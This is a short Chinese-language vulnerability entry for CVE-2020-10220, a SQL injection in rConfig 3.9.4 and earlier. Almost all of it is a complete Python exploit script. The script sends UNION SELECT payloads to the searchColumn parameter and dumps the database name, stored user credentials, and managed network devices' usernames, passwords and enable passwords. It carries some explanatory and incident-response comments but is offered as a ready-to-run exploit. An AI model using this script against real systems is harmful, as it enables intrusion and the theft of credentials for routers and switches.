【初级】rconfig SQL注入

CVE-2020-10220
漏洞描述：该漏洞影响 Web Interface 组件中的 commands.inc.php 文件，受影响的参数为 searchColumn（参数类型：Parameter），对该参数的输入可导致 SQL 注入。
rConfig 3.9.4及之前版本中存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。
影响版本:rConfig 3.9.4及之前版本
EXP:

import requests
import sys
import urllib.parse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Silence the urllib3 warning that each verify=False request would otherwise print.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

print ("rconfig 3.9 - SQL Injection PoC")
# Exactly one argument is expected: the base URL of the instance under test.
if len(sys.argv) != 2:
    print ("[+] Usage : ./rconfig_exploit.py https://target")
    exit()

# Vulnerable endpoint and the query string it is reached with (CVE-2020-10220,
# rConfig <= 3.9.4 per the write-up above); the injection point is the
# searchColumn parameter. Requests of this shape (GET /commands.inc.php with
# SQL keywords in searchColumn) are what an access-log review or a WAF/IDS
# rule for this issue should match.
vuln_page="/commands.inc.php"
vuln_parameters="?searchOption=contains&searchField=vuln&search=search&searchColumn=command"
given_target = sys.argv[1]
# Full URL = base + page + query string; the payloads below are appended to it verbatim.
target =  given_target
target += vuln_page
target += vuln_parameters

# One session for every request. verify=False disables TLS certificate
# validation for this probe. Note that `target` already ends with vuln_page
# and the query string, so this probe appends the page path a second time;
# only its status code is consulted further down.
request = requests.session()
dashboard_request = request.get(target+vuln_page, allow_redirects=False, verify=False)


def extractDBinfos(myTarget: str | None = None, myPayload: str | None = None) -> str:
        """
        Send one request and return the text enclosed by the response's [PWN] markers.

        Uses the module-level ``request`` session created above.

        Args:
                myTarget (str | None): Full URL including the vulnerable query string.
                myPayload (str | None): Already URL-encoded payload appended verbatim
                        to ``myTarget``. No encoding happens here despite the local
                        name ``encoded_request`` (``urllib.parse`` is imported but
                        unused in this file).
        Returns:
                str: The text between the first and second ``[PWN]`` markers in the
                response body (or everything after the first marker if there is only
                one); the fixed text "Maybe no more information ?" when no marker is
                present. The search is done on ``str(content)``, i.e. the repr of the
                raw bytes, not on decoded text.
        Raises:
                TypeError: if either argument is left at its ``None`` default, since
                the two values are concatenated with ``+``.
        """
        result = ""
        encoded_request = myTarget+myPayload
        exploit_req = request.get(encoded_request)
        # Marker check on the repr of the raw body; split()[1] keeps only the
        # first delimited fragment.
        if '[PWN]' in str(exploit_req.content):
                result = str(exploit_req.content).split('[PWN]')[1]
        else:
                result="Maybe no more information ?"

        return result


# The earlier probe counts as "endpoint present" unless it answered 404;
# any other status (including 403/500) proceeds.
if dashboard_request.status_code != 404:
        print ("[+] Triggering the payloads on "+given_target+vuln_page)
        # Step 1: current database name. The hex literals inside CONCAT() are the
        # "[PWN]" delimiters that extractDBinfos() splits the response on.
        print ("[+] Extracting the current DB name :")
        db_payload = "%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,database(),0x5B50574E5D3C42523E)%20limit%200,1),NULL--"
        db_name = extractDBinfos(target,db_payload)
        print (db_name)
        # Step 2: first 10 rows of <db>.users. db_name is interpolated unchecked,
        # so the fallback text returned when step 1 found no marker would be
        # interpolated into the query as well.
        print ("[+] Extracting 10 first users :")
        for i in range (0, 10):
            user1_payload="%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,username,0x3A,id,0x3A,password,0x5B50574E5D3C42523E)%20FROM%20"+db_name+".users+limit+"+str(i)+","+str(i+1)+"),NULL--"
            user_h = extractDBinfos(target,user1_payload)
            # One request per row; the row count is a hard-coded 10.
            print (user_h)
        # Step 3: first 10 rows of <db>.nodes, including the stored device
        # credentials (devicePassword, deviceEnablePassword). For incident
        # response this is the severe part: an instance that shows this query
        # pattern in its logs should have its managed-device credentials
        # rotated, not only the rConfig user accounts.
        print ("[+] Extracting 10 first devices :")
        for i in range (0, 10):
            device_payload="%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,deviceName,0x3A,deviceIpAddr,0x3A,deviceUsername,0x3A,devicePassword,0x3A,deviceEnablePassword,0x5B50574E5D3C42523E)%20FROM%20"+db_name+".nodes+limit+"+str(i)+","+str(i+1)+"),NULL--"
            device_h = extractDBinfos(target,device_payload)
            # One request per row; the row count is a hard-coded 10.
            print (device_h)

        print ("Done")

else:
    # The probe returned 404: the base URL is assumed to be wrong.
    print ("[-] Please verify the URI")
    exit()

漏洞复现
